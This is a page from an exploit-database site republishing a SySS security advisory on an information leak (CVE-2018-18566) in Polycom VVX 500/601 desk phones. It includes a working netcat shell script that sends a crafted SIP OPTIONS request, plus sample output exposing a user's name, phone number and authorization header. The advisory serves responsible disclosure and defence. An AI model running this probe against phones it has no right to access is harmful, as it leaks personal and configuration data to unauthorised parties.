0day.today - أكبر قاعدة بيانات للثغرات في العالم.
![](/img/logo_green.jpg)
We use one main domain DOMAIN_LINK
If you want to purchase the exploit or pay for service, you need to buy Gold. We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ أرسل ] rules
- Visit the [ الأسئلة الشائعة ] page
- [ Register ] profile
- Get [ الذهب ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ [email protected] ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
يمكنكم الاتصال بنا من خلال:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability
المؤلف
الخطر
![](/img/risk/critlow_2.gif)
Security Risk Medium
]0day-ID
الصنف
تاريخ الإضافة
CVE
المنصة
Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability Product: VVX 500 / VVX 601 Manufacturer: Polycom Affected Version(s): <= 5.8.0.12848 Tested Version(s): 5.4.0.10182, 5.8.0.12848 Vulnerability Type: Information Exposure (CWE-200) Risk Level: Low Solution Status: Open Manufacturer Notification: 2018-08-29 Solution Date: 20??-??-?? Public Disclosure: 2018-10-23 CVE Reference: CVE-2018-18566 Authors of Advisory: Micha Borrmann (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: If a Polycom VVX 500/601 [1] is used with an on-premise installation with Skype for Business, the phone leaks the configured phone number and the name to unauthorized clients via SIP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The phone has a SIP service running by default on TCP port 5060. This service can be abused to leak information about the configuration of the phone. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Script getdatafrompolycom.sh #!/bin/sh # Micha Borrmann <[email protected]> OWNIP=192.168.100.102 if [ -z "$1" ] then echo "Please enter an IPv4 address as target" exit else TARGET=$1 fi echo 'OPTIONS sip:dummy SIP/2.0 Via: SIP/2.0/TCP '$OWNIP':5060 To: <sip:'$OWNIP':5060> From: <sip:127.0.0.1:5060> Call-ID: 1 CSeq: 1 OPTIONS Contact: <sip:127.0.0.1:5060> Accept: application/sdp Content-Length: 0 ' | recode ..ibmpc | netcat -w 1 $TARGET 5060 Start the script against a phone and see the result: $ ./getpolycom.sh 192.168.100.101 SIP/2.0 200 OK Via: SIP/2.0/TCP 192.168.100.102:5060 From: <sip:127.0.0.1:5060> To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE CSeq: 1 OPTIONS Call-ID: 1 Contact: <sip:[email protected];opaque=user:epid:XYZ...;abcd> Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER Supported: replaces,100rel User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848 Accept-Language: en P-Preferred-Identity: "Micha Borrmann" <sip:[email protected]>,<tel:+49XYZ334455661234;ext=1234> Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml Accept-Encoding: identity Supported: 100rel,replaces,norefersub,sdp-anat Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001" Content-Length: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install the new firmware which has disabled the SIP service by default. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-08-13: Detection of the vulnerability 2018-08-29: Vulnerability reported to manufacturer 2018-10-22: CVE number assigned 2018-10-23: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product web sites for the phones https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html [2] SySS Security Advisory SYSS-2018-028 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ # 0day.today [2024-07-02] #